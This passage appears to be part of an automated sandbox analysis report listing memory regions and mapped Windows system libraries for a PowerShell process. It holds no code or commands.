"c:\\windows\\system32\\lpk.dll") Region: id = 695 start_va = 0x7fefde80000 end_va = 0x7fefdf1efff entry_point = 0x7fefde80000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 696 start_va = 0x7fefdfc0000 end_va = 0x7fefe096fff entry_point = 0x7fefdfc0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 697 start_va = 0x7fefe210000 end_va = 0x7fefe276fff entry_point = 0x7fefe210000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 698 start_va = 0x7fefe280000 end_va = 0x7fefe2f0fff entry_point = 0x7fefe280000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 699 start_va = 0x7fefe410000 end_va = 0x7fefe4eafff entry_point = 0x7fefe410000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 700 start_va = 0x7fefe4f0000 end_va = 0x7fefe6f2fff entry_point = 0x7fefe4f0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 701 start_va = 0x7feff9a0000 end_va = 0x7feffaccfff entry_point = 0x7feff9a0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 702 start_va = 0x7feffd70000 end_va = 0x7feffe38fff entry_point = 0x7feffd70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 703 start_va = 0x7feffe40000 end_va = 0x7feffe5efff entry_point = 0x7feffe40000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 704 start_va = 0x340000 end_va = 0x346fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 705 start_va = 0x350000 end_va = 0x351fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 706 start_va = 0x360000 end_va = 0x362fff entry_point = 0x360000 region_type = mapped_file name = "powershell.exe.mui" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\powershell.exe.mui" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\en-us\\powershell.exe.mui") Region: id = 707 start_va = 0x370000 end_va = 0x370fff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 708 start_va = 0x390000 end_va = 0x517fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000390000" filename = "" Region: id = 709 start_va = 0x520000 end_va = 0x6a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 710 start_va = 0x6b0000 end_va = 0x1aaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006b0000" filename = "" Region: id = 711 start_va = 0x1ab0000 end_va = 0x1ab0fff entry_point = 0x0 region_type = private name = "private_0x0000000001ab0000" filename = "" Region: id = 712 start_va = 0x1ac0000 end_va = 0x1bbffff entry_point = 0x0 region_type = private name = "private_0x0000000001ac0000" filename = "" Region: id = 713 start_va = 0x1be0000 end_va = 0x1beffff entry_point = 0x0 region_type = private name = "private_0x0000000001be0000" filename = "" Region: id = 714 start_va = 0x1c40000 end_va = 0x1cbffff entry_point = 0x0 region_type = private name = "private_0x0000000001c40000" filename = "" Region: id = 715 start_va = 0x7fefd990000 end_va = 0x7fefd99efff entry_point = 0x7fefd990000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 716 start_va = 0x7fefe1e0000 end_va = 0x7fefe20dfff entry_point = 0x7fefe1e0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 717 start_va = 0x7fefe300000 end_va = 0x7fefe408fff entry_point = 0x7fefe300000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 718 start_va = 0x7fefc3f0000 end_va = 0x7fefc445fff entry_point = 0x7fefc3f0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 719 start_va = 0x1bc0000 end_va = 0x1bc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001bc0000" filename = "" Region: id = 720 start_va = 0x1bd0000 end_va = 0x1bd0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001bd0000" filename = "" Region: id = 721 start_va = 0x1cc0000 end_va = 0x1d9efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001cc0000" filename = "" Region: id = 722 start_va = 0x1eb0000 end_va = 0x1f2ffff entry_point = 0x0 region_type = private name = "private_0x0000000001eb0000" filename = "" Region: id = 723 start_va = 0x7fefe700000 end_va = 0x7feff487fff entry_point = 0x7fefe700000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 724 start_va = 0x7feffcd0000 end_va = 0x7feffd68fff entry_point = 0x7feffcd0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 725 start_va = 0x7fefce40000 end_va = 0x7fefce5dfff entry_point = 0x7fefce40000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 726 start_va = 0x7fefdaa0000 end_va = 0x7fefdaaefff entry_point = 0x7fefdaa0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 727 start_va = 0x1bf0000 end_va = 0x1bf1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001bf0000" filename = "" Region: id = 728 start_va = 0x7fefc5d0000 end_va = 0x7fefc7c3fff entry_point = 0x7fefc5d0000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll") Region: id = 729 start_va = 0x1c00000 end_va = 0x1c00fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c00000" filename = "" Region: id = 730 start_va = 0x1c10000 end_va = 0x1c11fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 731 start_va = 0x1f30000 end_va = 0x21fefff entry_point = 0x1f30000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 732 start_va = 0x2280000 end_va = 0x22fffff entry_point = 0x0 region_type = private name = "private_0x0000000002280000" filename = "" Region: id = 733 start_va = 0x2300000 end_va = 0x26f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002300000" filename = "" Region: id = 734 start_va = 0x7fefc450000 end_va = 0x7fefc57bfff entry_point = 0x7fefc450000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 735 start_va = 0x7fefdb50000 end_va = 0x7fefdb69fff entry_point = 0x7fefdb50000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 736 start_va = 0x7fefde30000 end_va = 0x7fefde65fff entry_point = 0x7fefde30000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 737 start_va = 0x7feffaf0000 end_va = 0x7feffcc6fff entry_point = 0x7feffaf0000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 738 start_va = 0x7fffffdb000 end_va = 0x7fffffdcfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Region: id = 739 start_va = 0x7fefbd50000 end_va = 0x7fefbd7cfff entry_point = 0x7fefbd50000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 740 start_va = 0x7feff8f0000 end_va = 0x7feff941fff entry_point = 0x7feff8f0000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 741 start_va = 0x1c30000 end_va = 0x1c30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c30000" filename = "" Region: id = 742 start_va = 0x1da0000 end_va = 0x1dbcfff entry_point = 0x1da0000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db" filename = "\\Users\\aDU0VK IWA5kLS\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000016.db" (normalized: "c:\\users\\adu0vk iwa5kls\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db") Region: id = 743 start_va = 0x2200000 end_va = 0x227ffff entry_point = 0x0 region_type = private name = "private_0x0000000002200000" filename = "" Region: id = 744 start_va = 0x7fefaad0000 end_va = 0x7fefab26fff entry_point = 0x7fefaad0000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 745 start_va = 0x7fffffd9000 end_va = 0x7fffffdafff entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 746 start_va = 0x1c20000 end_va = 0x1c23fff entry_point = 0x1c20000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 747 start_va = 0x1dc0000 end_va = 0x1deffff entry_point = 0x1dc0000 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000c.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000c.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000c.db") Region: id = 748 start_va = 0x1df0000 end_va = 0x1df3fff entry_point = 0x1df0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 749 start_va = 0x1e00000 end_va = 0x1e65fff entry_point = 0x1e00000 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 750 start_va = 0x27a0000 end_va = 0x281ffff entry_point = 0x0 region_type = private name = "private_0x00000000027a0000" filename = "" Region: id = 751 start_va = 0x7fef7ab0000 end_va = 0x7fef7abbfff entry_point = 0x7fef7ab0000 region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\System32\\linkinfo.dll" (normalized: "c:\\windows\\system32\\linkinfo.dll") Region: id = 752 start_va = 0x7fef7ac0000 end_va = 0x7fef7af3fff entry_point = 0x7fef7ac0000 region_type = mapped_file name = "shdocvw.dll" filename = "\\Windows\\System32\\shdocvw.dll" (normalized: "c:\\windows\\system32\\shdocvw.dll") Region: id = 753 start_va = 0x7fef7fc0000 end_va = 0x7fef803ffff entry_point = 0x7fef7fc0000 region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\System32\\ntshrui.dll" (normalized: "c:\\windows\\system32\\ntshrui.dll") Region: id = 754 start_va = 0x7fef8040000 end_va = 0x7fef804efff entry_point = 0x7fef8040000 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 755 start_va = 0x7fefba50000 end_va = 0x7fefba5afff entry_point = 0x7fefba50000 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 756 start_va = 0x7fefd890000 end_va = 0x7fefd8b2fff entry_point = 0x7fefd890000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 757 start_va = 0x7fffffd7000 end_va = 0x7fffffd8fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 758 start_va = 0x7fefd390000 end_va = 0x7fefd3a6fff entry_point = 0x7fefd390000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 759 start_va = 0x7fefd090000 end_va = 0x7fefd0d6fff entry_point = 0x7fefd090000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 760 start_va = 0x7feea9c0000 end_va = 0x7feeaa58fff entry_point = 0x7feea9c0000 region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscoreei.dll") Region: id = 761 start_va = 0x7fefcc60000 end_va = 0x7fefcc6bfff entry_point = 0x7fefcc60000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 762 start_va = 0x1e70000 end_va = 0x1e70fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e70000" filename = "" Region: id = 763 start_va = 0x28d0000 end_va = 0x294ffff entry_point = 0x0 region_type = private name = "private_0x00000000028d0000" filename = "" Region: id = 764 start_va = 0x756a0000 end_va = 0x75768fff entry_point = 0x756a0000 region_type = mapped_file name = "msvcr80.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_88e41e092fab0294\\msvcr80.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_88e41e092fab0294\\msvcr80.dll") Region: id = 765 start_va = 0x7fee8cc0000 end_va = 0x7fee965cfff entry_point = 0x7fee8cc0000 region_type = mapped_file name = "mscorwks.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorwks.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\mscorwks.dll") Region: id = 766 start_va = 0x1e80000 end_va = 0x1e82fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 767 start_va = 0x1e90000 end_va = 0x1e90fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 768 start_va = 0x2700000 end_va = 0x271ffff entry_point = 0x0 region_type = private name = "private_0x0000000002700000" filename = "" Region: id = 769 start_va = 0x2950000 end_va = 0x2a4ffff entry_point = 0x0 region_type = private name = "private_0x0000000002950000" filename = "" Region: id = 770 start_va = 0x2a80000 end_va = 0x2a8ffff entry_point = 0x0 region_type = private name = "private_0x0000000002a80000" filename = "" Region: id = 771 start_va = 0x2b40000 end_va = 0x2bbffff entry_point = 0x0 region_type = private name = "private_0x0000000002b40000" filename = "" Region: id = 772 start_va = 0x2bc0000 end_va = 0x1abbffff entry_point = 0x0 region_type = private name = "private_0x0000000002bc0000" filename = "" Region: id = 773 start_va = 0x1abc0000 end_va = 0x1b28ffff entry_point = 0x0 region_type = private name = "private_0x000000001abc0000" filename = "" Region: id = 774 start_va = 0x1b290000 end_va = 0x1b390fff entry_point = 0x0 region_type = private name = "private_0x000000001b290000" filename = "" Region: id = 775 start_va = 0x1b490000 end_va = 0x1b50ffff entry_point = 0x0 region_type = private name = "private_0x000000001b490000" filename = "" Region: id = 776 start_va = 0x7fee7de0000 end_va = 0x7fee8cbbfff entry_point = 0x7fee7de0000 region_type = mapped_file name = "mscorlib.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\mscorlib\\9469491f37d9c35b596968b206615309\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\mscorlib\\9469491f37d9c35b596968b206615309\\mscorlib.ni.dll") Region: id = 777 start_va = 0x7ff00020000 end_va = 0x7ff0002ffff entry_point = 0x0 region_type = private name = "private_0x000007ff00020000" filename = "" Region: id = 778 start_va = 0x7ff00030000 end_va = 0x7ff0003ffff entry_point = 0x0 region_type = private name = "private_0x000007ff00030000" filename = "" Region: id = 779 start_va = 0x7ff00040000 end_va = 0x7ff000dffff entry_point = 0x0 region_type = private name = "private_0x000007ff00040000" filename = "" Region: id = 780 start_va = 0x7ff000e0000 end_va = 0x7ff000effff entry_point = 0x0 region_type = private name = "private_0x000007ff000e0000" filename = "" Region: id = 781 start_va = 0x7ff000f0000 end_va = 0x7ff0015ffff entry_point = 0x0 region_type = private name = "private_0x000007ff000f0000" filename = "" Region: id = 782 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 783 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 784 start_va = 0x1ea0000 end_va = 0x1eaffff entry_point = 0x0 region_type = private name = "private_0x0000000001ea0000" filename = "" Region: id = 785 start_va = 0x1b510000 end_va = 0x1b7f1fff entry_point = 0x1b510000 region_type = mapped_file name = "system.management.automation.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll") Region: id = 786 start_va = 0x7fee73b0000 end_va = 0x7fee7dd2fff entry_point = 0x7fee73b0000 region_type = mapped_file name = "system.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System\\adff7dd9fe8e541775c46b6363401b22\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system\\adff7dd9fe8e541775c46b6363401b22\\system.ni.dll") Region: id = 787 start_va = 0x7fee97c0000 end_va = 0x7fee9871fff entry_point = 0x7fee97c0000 region_type = mapped_file name = "microsoft.powershell.consolehost.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\b023321bc53c20c10ccbbd8f78c82c82\\Microsoft.PowerShell.ConsoleHost.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\b023321bc53c20c10ccbbd8f78c82c82\\microsoft.powershell.consolehost.ni.dll") Region: id = 788 start_va = 0x7fffff10000 end_va = 0x7fffff1ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff10000" filename = "" Region: id = 789 start_va = 0x7fffff20000 end_va = 0x7fffffaffff entry_point = 0x0 region_type = private name = "private_0x000007fffff20000" filename = "" Region: id = 790 start_va = 0x7fee6850000 end_va = 0x7fee73acfff entry_point = 0x7fee6850000 region_type = mapped_file name = "system.management.automation.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Management.A#\\009a09f5b2322bb8c5520dc5ddbb28bb\\System.Management.Automation.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.management.a#\\009a09f5b2322bb8c5520dc5ddbb28bb\\system.management.automation.ni.dll") Region: id = 791 start_va = 0x7ff00160000 end_va = 0x7ff0016ffff entry_point = 0x0 region_type = private name = "private_0x000007ff00160000" filename = "" Region: id = 792 start_va = 0x2720000 end_va = 0x2722fff entry_point = 0x2720000 region_type = mapped_file name = "l_intl.nls" filename = "\\Windows\\System32\\l_intl.nls" (normalized: "c:\\windows\\system32\\l_intl.nls") Region: id = 793 start_va = 0x1b3a0000 end_va = 0x1b45ffff entry_point = 0x1b3a0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 794 start_va = 0x77d20000 end_va = 0x77d26fff entry_point = 0x77d20000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 795 start_va = 0x2730000 end_va = 0x2730fff entry_point = 0x0 region_type = private name = "private_0x0000000002730000" filename = "" Region: id = 796 start_va = 0x2740000 end_va = 0x2744fff entry_point = 0x2740000 region_type = mapped_file name = "sorttbls.nlp" filename = "\\Windows\\assembly\\GAC_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp" (normalized: "c:\\windows\\assembly\\gac_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp") Region: id = 797 start_va = 0x2750000 end_va = 0x2790fff entry_point = 0x2750000 region_type = mapped_file name = "sortkey.nlp" filename = "\\Windows\\assembly\\GAC_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp" (normalized: "c:\\windows\\assembly\\gac_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp") Region: id = 798 start_va = 0x7ff00170000 end_va = 0x7ff0017ffff entry_point = 0x0 region_type = private name = "private_0x000007ff00170000" filename = "" Region: id = 799 start_va = 0x2820000 end_va = 0x2827fff entry_point = 0x2820000 region_type = mapped_file name = "microsoft.wsman.runtime.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Runtime\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Runtime.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\microsoft.wsman.runtime\\1.0.0.0__31bf3856ad364e35\\microsoft.wsman.runtime.dll") Region: id = 800 start_va = 0x2830000 end_va = 0x2830fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002830000" filename = "" Region: id = 801 start_va = 0x1e230000 end_va = 0x1e278fff entry_point = 0x1e230000 region_type = mapped_file name = "system.transactions.dll" filename = "\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll" (normalized: "c:\\windows\\assembly\\gac_64\\system.transactions\\2.0.0.0__b77a5c561934e089\\system.transactions.dll") Region: id = 802 start_va = 0x7fee6310000 end_va = 0x7fee63f4fff entry_point = 0x7fee6310000 region_type = mapped_file name = "system.transactions.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Transactions\\051655963f24f9ade08486084c570086\\System.Transactions.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.transactions\\051655963f24f9ade08486084c570086\\system.transactions.ni.dll") Region: id = 803 start_va = 0x7fee6400000 end_va = 0x7fee64a9fff entry_point = 0x7fee6400000 region_type = mapped_file name = "microsoft.wsman.management.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.WSMan.Man#\\8cd73e65058ef6f77f36b62a74ec3344\\Microsoft.WSMan.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.wsman.man#\\8cd73e65058ef6f77f36b62a74ec3344\\microsoft.wsman.management.ni.dll") Region: id = 804 start_va = 0x7fee64b0000 end_va = 0x7fee6518fff entry_point = 0x7fee64b0000 region_type = mapped_file name = "microsoft.powershell.commands.diagnostics.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\ec50af274bf7a15fb59ac1f0d353b7ea\\Microsoft.PowerShell.Commands.Diagnostics.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\ec50af274bf7a15fb59ac1f0d353b7ea\\microsoft.powershell.commands.diagnostics.ni.dll") Region: id = 805 start_va = 0x7fee6520000 end_va = 0x7fee684dfff entry_point = 0x7fee6520000 region_type = mapped_file name = "system.core.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Core\\83e2f6909980da7347e7806d8c26670e\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.core\\83e2f6909980da7347e7806d8c26670e\\system.core.ni.dll") Region: id = 806 start_va = 0x7fee9d60000 end_va = 0x7fee9d91fff entry_point = 0x7fee9d60000 region_type = mapped_file name = "system.configuration.install.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Configuratio#\\fcf35536476614410e0b0bd0e412199e\\System.Configuration.Install.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.configuratio#\\fcf35536476614410e0b0bd0e412199e\\system.configuration.install.ni.dll") Region: id = 807 start_va = 0x2840000 end_va = 0x2840fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002840000" filename = "" Region: id = 808 start_va = 0x1b800000 end_va = 0x1b8fffff entry_point = 0x0 region_type = private name = "private_0x000000001b800000" filename = "" Region: id = 809 start_va = 0x642ff4a0000 end_va = 0x642ff4a9fff entry_point = 0x642ff4a0000 region_type = mapped_file name = "culture.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Culture.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\culture.dll") Region: id = 810 start_va = 0x7fee5fd0000 end_va = 0x7fee60e7fff entry_point = 0x7fee5fd0000 region_type = mapped_file name = "microsoft.powershell.commands.management.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\9206dc8156588e608d405729c833edc5\\Microsoft.PowerShell.Commands.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\9206dc8156588e608d405729c833edc5\\microsoft.powershell.commands.management.ni.dll") Region: id = 811 start_va = 0x7fee60f0000 end_va = 0x7fee6305fff entry_point = 0x7fee60f0000 region_type = mapped_file name = "microsoft.powershell.commands.utility.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\cdf48153115fc0bb466f37b7dcad9ac5\\Microsoft.PowerShell.Commands.Utility.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\cdf48153115fc0bb466f37b7dcad9ac5\\microsoft.powershell.commands.utility.ni.dll") Region: id = 812 start_va = 0x7fee9780000 end_va = 0x7fee97bdfff entry_point = 0x7fee9780000 region_type = mapped_file name = "microsoft.powershell.security.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\b5a6a5ce3cd3d4dd2b151315c612aeff\\Microsoft.PowerShell.Security.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\b5a6a5ce3cd3d4dd2b151315c612aeff\\microsoft.powershell.security.ni.dll") Region: id = 813 start_va = 0x2840000 end_va = 0x2893fff entry_point = 0x2840000 region_type = mapped_file name = "mscorrc.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorrc.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\mscorrc.dll") Region: id = 814 start_va = 0x7fee5610000 end_va = 0x7fee57a4fff entry_point = 0x7fee5610000 region_type = mapped_file name = "system.directoryservices.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.DirectorySer#\\c1cdea55f62c9e8b9b9c1ae4c23b1c1f\\System.DirectoryServices.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.directoryser#\\c1cdea55f62c9e8b9b9c1ae4c23b1c1f\\system.directoryservices.ni.dll") Region: id = 815 start_va = 0x7fee57b0000 end_va = 0x7fee591bfff entry_point = 0x7fee57b0000 region_type = mapped_file name = "system.management.ni.dll" filename = 